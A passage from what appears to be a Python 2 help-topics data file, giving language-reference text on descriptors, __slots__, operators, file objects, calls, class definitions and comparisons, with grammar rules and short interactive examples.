or classes (ones that subclass "object()" or "type()").\n\nThe starting point for descriptor invocation is a binding, "a.x". 
How\nthe arguments are assembled depends on "a":\n\nDirect Call\n The simplest and least common call is when user code directly\n invokes a descriptor method: "x.__get__(a)".\n\nInstance Binding\n If binding to a new-style object instance, "a.x" is transformed\n into the call: "type(a).__dict__[\'x\'].__get__(a, type(a))".\n\nClass Binding\n If binding to a new-style class, "A.x" is transformed into the\n call: "A.__dict__[\'x\'].__get__(None, A)".\n\nSuper Binding\n If "a" is an instance of "super", then the binding "super(B,\n obj).m()" searches "obj.__class__.__mro__" for the base class "A"\n immediately preceding "B" and then invokes the descriptor with the\n call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n\nFor instance bindings, the precedence of descriptor invocation depends\non which descriptor methods are defined. A descriptor can define\nany combination of "__get__()", "__set__()" and "__delete__()". If it\ndoes not define "__get__()", then accessing the attribute will return\nthe descriptor object itself unless there is a value in the object\'s\ninstance dictionary. If the descriptor defines "__set__()" and/or\n"__delete__()", it is a data descriptor; if it defines neither, it is\na non-data descriptor. Normally, data descriptors define both\n"__get__()" and "__set__()", while non-data descriptors have just the\n"__get__()" method. Data descriptors with "__set__()" and "__get__()"\ndefined always override a redefinition in an instance dictionary. In\ncontrast, non-data descriptors can be overridden by instances.\n\nPython methods (including "staticmethod()" and "classmethod()") are\nimplemented as non-data descriptors. Accordingly, instances can\nredefine and override methods. This allows individual instances to\nacquire behaviors that differ from other instances of the same class.\n\nThe "property()" function is implemented as a data descriptor.\nAccordingly, instances cannot override the behavior of a property.\n\n\n__slots__\n=========\n\nBy default, instances of both old and new-style classes have a\ndictionary for attribute storage. This wastes space for objects\nhaving very few instance variables. The space consumption can become\nacute when creating large numbers of instances.\n\nThe default can be overridden by defining *__slots__* in a new-style\nclass definition. The *__slots__* declaration takes a sequence of\ninstance variables and reserves just enough space in each instance to\nhold a value for each variable. Space is saved because *__dict__* is\nnot created for each instance.\n\n__slots__\n\n This class variable can be assigned a string, iterable, or sequence\n of strings with variable names used by instances. If defined in a\n new-style class, *__slots__* reserves space for the declared\n variables and prevents the automatic creation of *__dict__* and\n *__weakref__* for each instance.\n\n New in version 2.2.\n\nNotes on using *__slots__*\n\n* When inheriting from a class without *__slots__*, the *__dict__*\n attribute of that class will always be accessible, so a *__slots__*\n definition in the subclass is meaningless.\n\n* Without a *__dict__* variable, instances cannot be assigned new\n variables not listed in the *__slots__* definition. Attempts to\n assign to an unlisted variable name raise "AttributeError". 
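For example (an\n illustrative session; the class name "C" is made up):\n\n >>> class C(object):\n ...     __slots__ = (\'x\',)\n ...\n >>> c = C()\n >>> c.x = 1\n >>> c.y = 2\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n AttributeError: \'C\' object has no attribute \'y\'\n\n 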
If\n dynamic assignment of new variables is desired, then add\n "\'__dict__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__dict__\'" to the\n *__slots__* declaration would not enable the assignment of new\n attributes not specifically listed in the sequence of instance\n variable names.\n\n* Without a *__weakref__* variable for each instance, classes\n defining *__slots__* do not support weak references to their\n instances. If weak reference support is needed, then add\n "\'__weakref__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__weakref__\'" to the\n *__slots__* declaration would not enable support for weak\n references.\n\n* *__slots__* are implemented at the class level by creating\n descriptors (Implementing Descriptors) for each variable name. As a\n result, class attributes cannot be used to set default values for\n instance variables defined by *__slots__*; otherwise, the class\n attribute would overwrite the descriptor assignment.\n\n* The action of a *__slots__* declaration is limited to the class\n where it is defined. As a result, subclasses will have a *__dict__*\n unless they also define *__slots__* (which must only contain names\n of any *additional* slots).\n\n* If a class defines a slot also defined in a base class, the\n instance variable defined by the base class slot is inaccessible\n (except by retrieving its descriptor directly from the base class).\n This renders the meaning of the program undefined. In the future, a\n check may be added to prevent this.\n\n* Nonempty *__slots__* does not work for classes derived from\n "variable-length" built-in types such as "long", "str" and "tuple".\n\n* Any non-string iterable may be assigned to *__slots__*. Mappings\n may also be used; however, in the future, special meaning may be\n assigned to the values corresponding to each key.\n\n* *__class__* assignment works only if both classes have the same\n *__slots__*.\n\n Changed in version 2.6: Previously, *__class__* assignment raised an\n error if either new or old class had *__slots__*.\n', 'attribute-references': u'\nAttribute references\n********************\n\nAn attribute reference is a primary followed by a period and a name:\n\n attributeref ::= primary "." identifier\n\nThe primary must evaluate to an object of a type that supports\nattribute references, e.g., a module, list, or an instance. This\nobject is then asked to produce the attribute whose name is the\nidentifier. If this attribute is not available, the exception\n"AttributeError" is raised. Otherwise, the type and value of the\nobject produced are determined by the object. 
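For example (an\nillustrative session; "imag" is an attribute of complex numbers, and\nthe attribute name "nonexistent" is made up):\n\n >>> (1+2j).imag\n 2.0\n >>> (1+2j).nonexistent\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n AttributeError: \'complex\' object has no attribute \'nonexistent\'\n\n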
Multiple evaluations of\nthe same attribute reference may yield different objects.\n', 'augassign': u'\nAugmented assignment statements\n*******************************\n\nAugmented assignment is the combination, in a single statement, of a\nbinary operation and an assignment statement:\n\n augmented_assignment_stmt ::= augtarget augop (expression_list | yield_expression)\n augtarget ::= identifier | attributeref | subscription | slicing\n augop ::= "+=" | "-=" | "*=" | "/=" | "//=" | "%=" | "**="\n | ">>=" | "<<=" | "&=" | "^=" | "|="\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn augmented assignment evaluates the target (which, unlike normal\nassignment statements, cannot be an unpacking) and the expression\nlist, performs the binary operation specific to the type of assignment\non the two operands, and assigns the result to the original target.\nThe target is only evaluated once.\n\nAn augmented assignment expression like "x += 1" can be rewritten as\n"x = x + 1" to achieve a similar, but not exactly equal effect. In the\naugmented version, "x" is only evaluated once. Also, when possible,\nthe actual operation is performed *in-place*, meaning that rather than\ncreating a new object and assigning that to the target, the old object\nis modified instead.\n\nWith the exception of assigning to tuples and multiple targets in a\nsingle statement, the assignment done by augmented assignment\nstatements is handled the same way as normal assignments. Similarly,\nwith the exception of the possible *in-place* behavior, the binary\noperation performed by augmented assignment is the same as the normal\nbinary operations.\n\nFor targets which are attribute references, the same caveat about\nclass and instance attributes applies as for regular assignments.\n', 'binary': u'\nBinary arithmetic operations\n****************************\n\nThe binary arithmetic operations have the conventional priority\nlevels. Note that some of these operations also apply to certain non-\nnumeric types. Apart from the power operator, there are only two\nlevels, one for multiplicative operators and one for additive\noperators:\n\n m_expr ::= u_expr | m_expr "*" u_expr | m_expr "//" u_expr | m_expr "/" u_expr\n | m_expr "%" u_expr\n a_expr ::= m_expr | a_expr "+" m_expr | a_expr "-" m_expr\n\nThe "*" (multiplication) operator yields the product of its arguments.\nThe arguments must either both be numbers, or one argument must be an\ninteger (plain or long) and the other must be a sequence. In the\nformer case, the numbers are converted to a common type and then\nmultiplied together. In the latter case, sequence repetition is\nperformed; a negative repetition factor yields an empty sequence.\n\nThe "/" (division) and "//" (floor division) operators yield the\nquotient of their arguments. The numeric arguments are first\nconverted to a common type. Plain or long integer division yields an\ninteger of the same type; the result is that of mathematical division\nwith the \'floor\' function applied to the result. Division by zero\nraises the "ZeroDivisionError" exception.\n\nThe "%" (modulo) operator yields the remainder from the division of\nthe first argument by the second. The numeric arguments are first\nconverted to a common type. A zero right argument raises the\n"ZeroDivisionError" exception. The arguments may be floating point\nnumbers, e.g., "3.14%0.7" equals "0.34" (since "3.14" equals "4*0.7 +\n0.34".) 
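For example, with integer operands of mixed sign (an illustrative\nsession):\n\n >>> 14 % 4\n 2\n >>> -14 % 4\n 2\n >>> 14 % -4\n -2\n\n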
The modulo operator always yields a result with the same sign\nas its second operand (or zero); the absolute value of the result is\nstrictly smaller than the absolute value of the second operand [2].\n\nThe integer division and modulo operators are connected by the\nfollowing identity: "x == (x/y)*y + (x%y)". Integer division and\nmodulo are also connected with the built-in function "divmod()":\n"divmod(x, y) == (x/y, x%y)". These identities don\'t hold for\nfloating point numbers; there similar identities hold approximately\nwhere "x/y" is replaced by "floor(x/y)" or "floor(x/y) - 1" [3].\n\nIn addition to performing the modulo operation on numbers, the "%"\noperator is also overloaded by string and unicode objects to perform\nstring formatting (also known as interpolation). The syntax for string\nformatting is described in the Python Library Reference, section\nString Formatting Operations.\n\nDeprecated since version 2.3: The floor division operator, the modulo\noperator, and the "divmod()" function are no longer defined for\ncomplex numbers. Instead, convert to a floating point number using\nthe "abs()" function if appropriate.\n\nThe "+" (addition) operator yields the sum of its arguments. The\narguments must either both be numbers or both sequences of the same\ntype. In the former case, the numbers are converted to a common type\nand then added together. In the latter case, the sequences are\nconcatenated.\n\nThe "-" (subtraction) operator yields the difference of its arguments.\nThe numeric arguments are first converted to a common type.\n', 'bitwise': u'\nBinary bitwise operations\n*************************\n\nEach of the three bitwise operations has a different priority level:\n\n and_expr ::= shift_expr | and_expr "&" shift_expr\n xor_expr ::= and_expr | xor_expr "^" and_expr\n or_expr ::= xor_expr | or_expr "|" xor_expr\n\nThe "&" operator yields the bitwise AND of its arguments, which must\nbe plain or long integers. The arguments are converted to a common\ntype.\n\nThe "^" operator yields the bitwise XOR (exclusive OR) of its\narguments, which must be plain or long integers. The arguments are\nconverted to a common type.\n\nThe "|" operator yields the bitwise (inclusive) OR of its arguments,\nwhich must be plain or long integers. The arguments are converted to\na common type.\n', 'bltin-code-objects': u'\nCode Objects\n************\n\nCode objects are used by the implementation to represent "pseudo-\ncompiled" executable Python code such as a function body. They differ\nfrom function objects because they don\'t contain a reference to their\nglobal execution environment. Code objects are returned by the built-\nin "compile()" function and can be extracted from function objects\nthrough their "func_code" attribute. See also the "code" module.\n\nA code object can be executed or evaluated by passing it (instead of a\nsource string) to the "exec" statement or the built-in "eval()"\nfunction.\n\nSee The standard type hierarchy for more information.\n', 'bltin-ellipsis-object': u'\nThe Ellipsis Object\n*******************\n\nThis object is used by extended slice notation (see Slicings). It\nsupports no special operations. There is exactly one ellipsis object,\nnamed "Ellipsis" (a built-in name).\n\nIt is written as "Ellipsis". When in a subscript, it can also be\nwritten as "...", for example "seq[...]".\n', 'bltin-file-objects': u'\nFile Objects\n************\n\nFile objects are implemented using C\'s "stdio" package and can be\ncreated with the built-in "open()" function. 
File objects are also\nreturned by some other built-in functions and methods, such as\n"os.popen()" and "os.fdopen()" and the "makefile()" method of socket\nobjects. Temporary files can be created using the "tempfile" module,\nand high-level file operations such as copying, moving, and deleting\nfiles and directories can be achieved with the "shutil" module.\n\nWhen a file operation fails for an I/O-related reason, the exception\n"IOError" is raised. This includes situations where the operation is\nnot defined for some reason, like "seek()" on a tty device or writing\na file opened for reading.\n\nFiles have the following methods:\n\nfile.close()\n\n Close the file. A closed file cannot be read or written any more.\n Any operation which requires that the file be open will raise a\n "ValueError" after the file has been closed. Calling "close()"\n more than once is allowed.\n\n As of Python 2.5, you can avoid having to call this method\n explicitly if you use the "with" statement. For example, the\n following code will automatically close *f* when the "with" block\n is exited:\n\n from __future__ import with_statement # This isn\'t required in Python 2.6\n\n with open("hello.txt") as f:\n for line in f:\n print line,\n\n In older versions of Python, you would have needed to do this to\n get the same effect:\n\n f = open("hello.txt")\n try:\n for line in f:\n print line,\n finally:\n f.close()\n\n Note: Not all "file-like" types in Python support use as a\n context manager for the "with" statement. If your code is\n intended to work with any file-like object, you can use the\n function "contextlib.closing()" instead of using the object\n directly.\n\nfile.flush()\n\n Flush the internal buffer, like "stdio"\'s "fflush()". This may be\n a no-op on some file-like objects.\n\n Note: "flush()" does not necessarily write the file\'s data to\n disk. Use "flush()" followed by "os.fsync()" to ensure this\n behavior.\n\nfile.fileno()\n\n Return the integer "file descriptor" that is used by the underlying\n implementation to request I/O operations from the operating system.\n This can be useful for other, lower level interfaces that use file\n descriptors, such as the "fcntl" module or "os.read()" and friends.\n\n Note: File-like objects which do not have a real file descriptor\n should *not* provide this method!\n\nfile.isatty()\n\n Return "True" if the file is connected to a tty(-like) device, else\n "False".\n\n Note: If a file-like object is not associated with a real file,\n this method should *not* be implemented.\n\nfile.next()\n\n A file object is its own iterator, for example "iter(f)" returns\n *f* (unless *f* is closed). When a file is used as an iterator,\n typically in a "for" loop (for example, "for line in f: print\n line.strip()"), the "next()" method is called repeatedly. This\n method returns the next input line, or raises "StopIteration" when\n EOF is hit when the file is open for reading (behavior is undefined\n when the file is open for writing). In order to make a "for" loop\n the most efficient way of looping over the lines of a file (a very\n common operation), the "next()" method uses a hidden read-ahead\n buffer. As a consequence of using a read-ahead buffer, combining\n "next()" with other file methods (like "readline()") does not work\n right. 
However, using "seek()" to reposition the file to an\n absolute position will flush the read-ahead buffer.\n\n New in version 2.3.\n\nfile.read([size])\n\n Read at most *size* bytes from the file (less if the read hits EOF\n before obtaining *size* bytes). If the *size* argument is negative\n or omitted, read all data until EOF is reached. The bytes are\n returned as a string object. An empty string is returned when EOF\n is encountered immediately. (For certain files, like ttys, it\n makes sense to continue reading after an EOF is hit.) Note that\n this method may call the underlying C function "fread()" more than\n once in an effort to acquire as close to *size* bytes as possible.\n Also note that when in non-blocking mode, less data than was\n requested may be returned, even if no *size* parameter was given.\n\n Note: This function is simply a wrapper for the underlying\n "fread()" C function, and will behave the same in corner cases,\n such as whether the EOF value is cached.\n\nfile.readline([size])\n\n Read one entire line from the file. A trailing newline character\n is kept in the string (but may be absent when a file ends with an\n incomplete line). [6] If the *size* argument is present and non-\n negative, it is a maximum byte count (including the trailing\n newline) and an incomplete line may be returned. When *size* is not\n 0, an empty string is returned *only* when EOF is encountered\n immediately.\n\n Note: Unlike "stdio"\'s "fgets()", the returned string contains\n null characters ("\'\\0\'") if they occurred in the input.\n\nfile.readlines([sizehint])\n\n Read until EOF using "readline()" and return a list containing the\n lines thus read. If the optional *sizehint* argument is present,\n instead of reading up to EOF, whole lines totalling approximately\n *sizehint* bytes (possibly after rounding up to an internal buffer\n size) are read. Objects implementing a file-like interface may\n choose to ignore *sizehint* if it cannot be implemented, or cannot\n be implemented efficiently.\n\nfile.xreadlines()\n\n This method returns the same thing as "iter(f)".\n\n New in version 2.1.\n\n Deprecated since version 2.3: Use "for line in file" instead.\n\nfile.seek(offset[, whence])\n\n Set the file\'s current position, like "stdio"\'s "fseek()". The\n *whence* argument is optional and defaults to "os.SEEK_SET" or "0"\n (absolute file positioning); other values are "os.SEEK_CUR" or "1"\n (seek relative to the current position) and "os.SEEK_END" or "2"\n (seek relative to the file\'s end). There is no return value.\n\n For example, "f.seek(2, os.SEEK_CUR)" advances the position by two\n and "f.seek(-3, os.SEEK_END)" sets the position to the third to\n last.\n\n Note that if the file is opened for appending (mode "\'a\'" or\n "\'a+\'"), any "seek()" operations will be undone at the next write.\n If the file is only opened for writing in append mode (mode "\'a\'"),\n this method is essentially a no-op, but it remains useful for files\n opened in append mode with reading enabled (mode "\'a+\'"). If the\n file is opened in text mode (without "\'b\'"), only offsets returned\n by "tell()" are legal. Use of other offsets causes undefined\n behavior.\n\n Note that not all file objects are seekable.\n\n Changed in version 2.6: Passing float values as offset has been\n deprecated.\n\nfile.tell()\n\n Return the file\'s current position, like "stdio"\'s "ftell()".\n\n Note: On Windows, "tell()" can return illegal values (after an\n "fgets()") when reading files with Unix-style line-endings. 
Use\n binary mode ("\'rb\'") to circumvent this problem.\n\nfile.truncate([size])\n\n Truncate the file\'s size. If the optional *size* argument is\n present, the file is truncated to (at most) that size. The size\n defaults to the current position. The current file position is not\n changed. Note that if a specified size exceeds the file\'s current\n size, the result is platform-dependent: possibilities include that\n the file may remain unchanged, increase to the specified size as if\n zero-filled, or increase to the specified size with undefined new\n content. Availability: Windows, many Unix variants.\n\nfile.write(str)\n\n Write a string to the file. There is no return value. Due to\n buffering, the string may not actually show up in the file until\n the "flush()" or "close()" method is called.\n\nfile.writelines(sequence)\n\n Write a sequence of strings to the file. The sequence can be any\n iterable object producing strings, typically a list of strings.\n There is no return value. (The name is intended to match\n "readlines()"; "writelines()" does not add line separators.)\n\nFiles support the iterator protocol. Each iteration returns the same\nresult as "readline()", and iteration ends when the "readline()"\nmethod returns an empty string.\n\nFile objects also offer a number of other interesting attributes.\nThese are not required for file-like objects, but should be\nimplemented if they make sense for the particular object.\n\nfile.closed\n\n bool indicating the current state of the file object. This is a\n read-only attribute; the "close()" method changes the value. It may\n not be available on all file-like objects.\n\nfile.encoding\n\n The encoding that this file uses. When Unicode strings are written\n to a file, they will be converted to byte strings using this\n encoding. In addition, when the file is connected to a terminal,\n the attribute gives the encoding that the terminal is likely to use\n (that information might be incorrect if the user has misconfigured\n the terminal). The attribute is read-only and may not be present\n on all file-like objects. It may also be "None", in which case the\n file uses the system default encoding for converting Unicode\n strings.\n\n New in version 2.3.\n\nfile.errors\n\n The Unicode error handler used along with the encoding.\n\n New in version 2.6.\n\nfile.mode\n\n The I/O mode for the file. If the file was created using the\n "open()" built-in function, this will be the value of the *mode*\n parameter. This is a read-only attribute and may not be present on\n all file-like objects.\n\nfile.name\n\n If the file object was created using "open()", the name of the\n file. Otherwise, some string that indicates the source of the file\n object, of the form "<...>". This is a read-only attribute and may\n not be present on all file-like objects.\n\nfile.newlines\n\n If Python was built with *universal newlines* enabled (the default)\n this read-only attribute exists, and for files opened in universal\n newline read mode it keeps track of the types of newlines\n encountered while reading the file. The values it can take are\n "\'\\r\'", "\'\\n\'", "\'\\r\\n\'", "None" (unknown, no newlines read yet) or\n a tuple containing all the newline types seen, to indicate that\n multiple newline conventions were encountered. 
For files not opened\n in universal newlines read mode the value of this attribute will be\n "None".\n\nfile.softspace\n\n Boolean that indicates whether a space character needs to be\n printed before another value when using the "print" statement.\n Classes that are trying to simulate a file object should also have\n a writable "softspace" attribute, which should be initialized to\n zero. This will be automatic for most classes implemented in\n Python (care may be needed for objects that override attribute\n access); types implemented in C will have to provide a writable\n "softspace" attribute.\n\n Note: This attribute is not used to control the "print"\n statement, but to allow the implementation of "print" to keep\n track of its internal state.\n', 'bltin-null-object': u'\nThe Null Object\n***************\n\nThis object is returned by functions that don\'t explicitly return a\nvalue. It supports no special operations. There is exactly one null\nobject, named "None" (a built-in name).\n\nIt is written as "None".\n', 'bltin-type-objects': u'\nType Objects\n************\n\nType objects represent the various object types. An object\'s type is\naccessed by the built-in function "type()". There are no special\noperations on types. The standard module "types" defines names for\nall standard built-in types.\n\nTypes are written like this: "<type \'int\'>".\n', 'booleans': u'\nBoolean operations\n******************\n\n or_test ::= and_test | or_test "or" and_test\n and_test ::= not_test | and_test "and" not_test\n not_test ::= comparison | "not" not_test\n\nIn the context of Boolean operations, and also when expressions are\nused by control flow statements, the following values are interpreted\nas false: "False", "None", numeric zero of all types, and empty\nstrings and containers (including strings, tuples, lists,\ndictionaries, sets and frozensets). All other values are interpreted\nas true. (See the "__nonzero__()" special method for a way to change\nthis.)\n\nThe operator "not" yields "True" if its argument is false, "False"\notherwise.\n\nThe expression "x and y" first evaluates *x*; if *x* is false, its\nvalue is returned; otherwise, *y* is evaluated and the resulting value\nis returned.\n\nThe expression "x or y" first evaluates *x*; if *x* is true, its value\nis returned; otherwise, *y* is evaluated and the resulting value is\nreturned.\n\n(Note that neither "and" nor "or" restrict the value and type they\nreturn to "False" and "True", but rather return the last evaluated\nargument. This is sometimes useful, e.g., if "s" is a string that\nshould be replaced by a default value if it is empty, the expression\n"s or \'foo\'" yields the desired value. 
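For example:\n\n >>> \'\' or \'foo\'\n \'foo\'\n >>> \'bar\' or \'foo\'\n \'bar\'\n >>> 0 and 1\n 0\n\n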
Because "not" has to invent a\nvalue anyway, it does not bother to return a value of the same type as\nits argument, so e.g., "not \'foo\'" yields "False", not "\'\'".)\n', 'break': u'\nThe "break" statement\n*********************\n\n break_stmt ::= "break"\n\n"break" may only occur syntactically nested in a "for" or "while"\nloop, but not nested in a function or class definition within that\nloop.\n\nIt terminates the nearest enclosing loop, skipping the optional "else"\nclause if the loop has one.\n\nIf a "for" loop is terminated by "break", the loop control target\nkeeps its current value.\n\nWhen "break" passes control out of a "try" statement with a "finally"\nclause, that "finally" clause is executed before really leaving the\nloop.\n', 'callable-types': u'\nEmulating callable objects\n**************************\n\nobject.__call__(self[, args...])\n\n Called when the instance is "called" as a function; if this method\n is defined, "x(arg1, arg2, ...)" is a shorthand for\n "x.__call__(arg1, arg2, ...)".\n', 'calls': u'\nCalls\n*****\n\nA call calls a callable object (e.g., a *function*) with a possibly\nempty series of *arguments*:\n\n call ::= primary "(" [argument_list [","]\n | expression genexpr_for] ")"\n argument_list ::= positional_arguments ["," keyword_arguments]\n ["," "*" expression] ["," keyword_arguments]\n ["," "**" expression]\n | keyword_arguments ["," "*" expression]\n ["," "**" expression]\n | "*" expression ["," keyword_arguments] ["," "**" expression]\n | "**" expression\n positional_arguments ::= expression ("," expression)*\n keyword_arguments ::= keyword_item ("," keyword_item)*\n keyword_item ::= identifier "=" expression\n\nA trailing comma may be present after the positional and keyword\narguments but does not affect the semantics.\n\nThe primary must evaluate to a callable object (user-defined\nfunctions, built-in functions, methods of built-in objects, class\nobjects, methods of class instances, and certain class instances\nthemselves are callable; extensions may define additional callable\nobject types). All argument expressions are evaluated before the call\nis attempted. Please refer to section Function definitions for the\nsyntax of formal *parameter* lists.\n\nIf keyword arguments are present, they are first converted to\npositional arguments, as follows. First, a list of unfilled slots is\ncreated for the formal parameters. If there are N positional\narguments, they are placed in the first N slots. Next, for each\nkeyword argument, the identifier is used to determine the\ncorresponding slot (if the identifier is the same as the first formal\nparameter name, the first slot is used, and so on). If the slot is\nalready filled, a "TypeError" exception is raised. Otherwise, the\nvalue of the argument is placed in the slot, filling it (even if the\nexpression is "None", it fills the slot). When all arguments have\nbeen processed, the slots that are still unfilled are filled with the\ncorresponding default value from the function definition. (Default\nvalues are calculated, once, when the function is defined; thus, a\nmutable object such as a list or dictionary used as default value will\nbe shared by all calls that don\'t specify an argument value for the\ncorresponding slot; this should usually be avoided.) If there are any\nunfilled slots for which no default value is specified, a "TypeError"\nexception is raised. 
Otherwise, the list of filled slots is used as\nthe argument list for the call.\n\n**CPython implementation detail:** An implementation may provide\nbuilt-in functions whose positional parameters do not have names, even\nif they are \'named\' for the purpose of documentation, and which\ntherefore cannot be supplied by keyword. In CPython, this is the case\nfor functions implemented in C that use "PyArg_ParseTuple()" to parse\ntheir arguments.\n\nIf there are more positional arguments than there are formal parameter\nslots, a "TypeError" exception is raised, unless a formal parameter\nusing the syntax "*identifier" is present; in this case, that formal\nparameter receives a tuple containing the excess positional arguments\n(or an empty tuple if there were no excess positional arguments).\n\nIf any keyword argument does not correspond to a formal parameter\nname, a "TypeError" exception is raised, unless a formal parameter\nusing the syntax "**identifier" is present; in this case, that formal\nparameter receives a dictionary containing the excess keyword\narguments (using the keywords as keys and the argument values as\ncorresponding values), or a (new) empty dictionary if there were no\nexcess keyword arguments.\n\nIf the syntax "*expression" appears in the function call, "expression"\nmust evaluate to an iterable. Elements from this iterable are treated\nas if they were additional positional arguments; if there are\npositional arguments *x1*, ..., *xN*, and "expression" evaluates to a\nsequence *y1*, ..., *yM*, this is equivalent to a call with M+N\npositional arguments *x1*, ..., *xN*, *y1*, ..., *yM*.\n\nA consequence of this is that although the "*expression" syntax may\nappear *after* some keyword arguments, it is processed *before* the\nkeyword arguments (and the "**expression" argument, if any -- see\nbelow). So:\n\n >>> def f(a, b):\n ... print a, b\n ...\n >>> f(b=1, *(2,))\n 2 1\n >>> f(a=1, *(2,))\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n TypeError: f() got multiple values for keyword argument \'a\'\n >>> f(1, *(2,))\n 1 2\n\nIt is unusual for both keyword arguments and the "*expression" syntax\nto be used in the same call, so in practice this confusion does not\narise.\n\nIf the syntax "**expression" appears in the function call,\n"expression" must evaluate to a mapping, the contents of which are\ntreated as additional keyword arguments. In the case of a keyword\nappearing in both "expression" and as an explicit keyword argument, a\n"TypeError" exception is raised.\n\nFormal parameters using the syntax "*identifier" or "**identifier"\ncannot be used as positional argument slots or as keyword argument\nnames. Formal parameters using the syntax "(sublist)" cannot be used\nas keyword argument names; the outermost sublist corresponds to a\nsingle unnamed argument slot, and the argument value is assigned to\nthe sublist using the usual tuple assignment rules after all other\nparameter processing is done.\n\nA call always returns some value, possibly "None", unless it raises an\nexception. How this value is computed depends on the type of the\ncallable object.\n\nIf it is---\n\na user-defined function:\n The code block for the function is executed, passing it the\n argument list. The first thing the code block will do is bind the\n formal parameters to the arguments; this is described in section\n Function definitions. 
When the code block executes a "return"\n statement, this specifies the return value of the function call.\n\na built-in function or method:\n The result is up to the interpreter; see Built-in Functions for the\n descriptions of built-in functions and methods.\n\na class object:\n A new instance of that class is returned.\n\na class instance method:\n The corresponding user-defined function is called, with an argument\n list that is one longer than the argument list of the call: the\n instance becomes the first argument.\n\na class instance:\n The class must define a "__call__()" method; the effect is then the\n same as if that method was called.\n', 'class': u'\nClass definitions\n*****************\n\nA class definition defines a class object (see section The standard\ntype hierarchy):\n\n classdef ::= "class" classname [inheritance] ":" suite\n inheritance ::= "(" [expression_list] ")"\n classname ::= identifier\n\nA class definition is an executable statement. It first evaluates the\ninheritance list, if present. Each item in the inheritance list\nshould evaluate to a class object or class type which allows\nsubclassing. The class\'s suite is then executed in a new execution\nframe (see section Naming and binding), using a newly created local\nnamespace and the original global namespace. (Usually, the suite\ncontains only function definitions.) When the class\'s suite finishes\nexecution, its execution frame is discarded but its local namespace is\nsaved. [4] A class object is then created using the inheritance list\nfor the base classes and the saved local namespace for the attribute\ndictionary. The class name is bound to this class object in the\noriginal local namespace.\n\n**Programmer\'s note:** Variables defined in the class definition are\nclass variables; they are shared by all instances. To create instance\nvariables, they can be set in a method with "self.name = value". Both\nclass and instance variables are accessible through the notation\n""self.name"", and an instance variable hides a class variable with\nthe same name when accessed in this way. Class variables can be used\nas defaults for instance variables, but using mutable values there can\nlead to unexpected results. For *new-style class*es, descriptors can\nbe used to create instance variables with different implementation\ndetails.\n\nClass definitions, like function definitions, may be wrapped by one or\nmore *decorator* expressions. The evaluation rules for the decorator\nexpressions are the same as for functions. The result must be a class\nobject, which is then bound to the class name.\n\n-[ Footnotes ]-\n\n[1] The exception is propagated to the invocation stack unless\n there is a "finally" clause which happens to raise another\n exception. That new exception causes the old one to be lost.\n\n[2] Currently, control "flows off the end" except in the case of\n an exception or the execution of a "return", "continue", or\n "break" statement.\n\n[3] A string literal appearing as the first statement in the\n function body is transformed into the function\'s "__doc__"\n attribute and therefore the function\'s *docstring*.\n\n[4] A string literal appearing as the first statement in the class\n body is transformed into the namespace\'s "__doc__" item and\n therefore the class\'s *docstring*.\n', 'comparisons': u'\nComparisons\n***********\n\nUnlike C, all comparison operations in Python have the same priority,\nwhich is lower than that of any arithmetic, shifting or bitwise\noperation. 
Also unlike C, expressions like "a < b < c" have the\ninterpretation that is conventional in mathematics:\n\n comparison ::= or_expr ( comp_operator or_expr )*\n comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n | "is" ["not"] | ["not"] "in"\n\nComparisons yield boolean values: "True" or "False".\n\nComparisons can be chained arbitrarily, e.g., "x < y <= z" is\nequivalent to "x < y and y <= z", except that "y" is evaluated only\nonce (but in both cases "z" is not evaluated at all when "x < y" is\nfound to be false).\n\nFormally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\nopN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\nthat each expression is evaluated at most once.\n\nNote that "a op1 b op2 c" doesn\'t imply any kind of comparison between\n*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\nperhaps not pretty).\n\nThe forms "<>" and "!=" are equivalent; for consistency with C, "!="\nis preferred; where "!=" is mentioned below "<>" is also accepted.\nThe "<>" spelling is considered obsolescent.\n\nThe operators "<", ">", "==", ">=", "<=", and "!=" compare the values\nof two objects. The objects need not have the same type. If both are\nnumbers, they are converted to a common type. Otherwise, objects of\ndifferent types *always* compare unequal, and are ordered consistently\nbut arbitrarily. You can control comparison behavior of objects of\nnon-built-in types by defining a "__cmp__" method or rich comparison\nmethods like "__gt__", described in section Special method names.\n\n(This unusual definition of comparison was used to simplify the\ndefinition of operations like sorting and the "in" and "not in"\noperators. In the future, the comparison rules for objects of\ndifferent types are likely to change.)\n\nComparison of objects of the same type depends on the type:\n\n* Numbers are compared arithmetically.\n\n* Strings are compared lexicographically using the numeric\n equivalents (the result of the built-in function "ord()") of their\n characters. Unicode and 8-bit strings are fully interoperable in\n this behavior. [4]\n\n* Tuples and lists are compared lexicographically using comparison\n of corresponding elements. This means that to compare equal, each\n element must compare equal and the two sequences must be of the same\n type and have the same length.\n\n If not equal, the sequences are ordered the same as their first\n differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n the same as "cmp(x,y)". If the corresponding element does not\n exist, the shorter sequence is ordered first (for example, "[1,2] <\n [1,2,3]").\n\n* Mappings (dictionaries) compare equal if and only if their sorted\n (key, value) lists compare equal. [5] Outcomes other than equality\n are resolved consistently, but are not otherwise defined. [6]\n\n* Most other objects of built-in types compare unequal unless they\n are the same object; the choice whether one object is considered\n smaller or larger than another one is made arbitrarily but\n consistently within one execution of a program.\n\nThe operators "in" and "not in" test for collection membership. "x in\ns" evaluates to true if *x* is a member of the collection *s*, and\nfalse otherwise. "x not in s" returns the negation of "x in s". 
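For\nexample:\n\n >>> 2 in [1, 2, 3]\n True\n >>> \'ab\' in \'abc\'\n True\n >>> 4 not in (1, 2, 3)\n True\n\n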
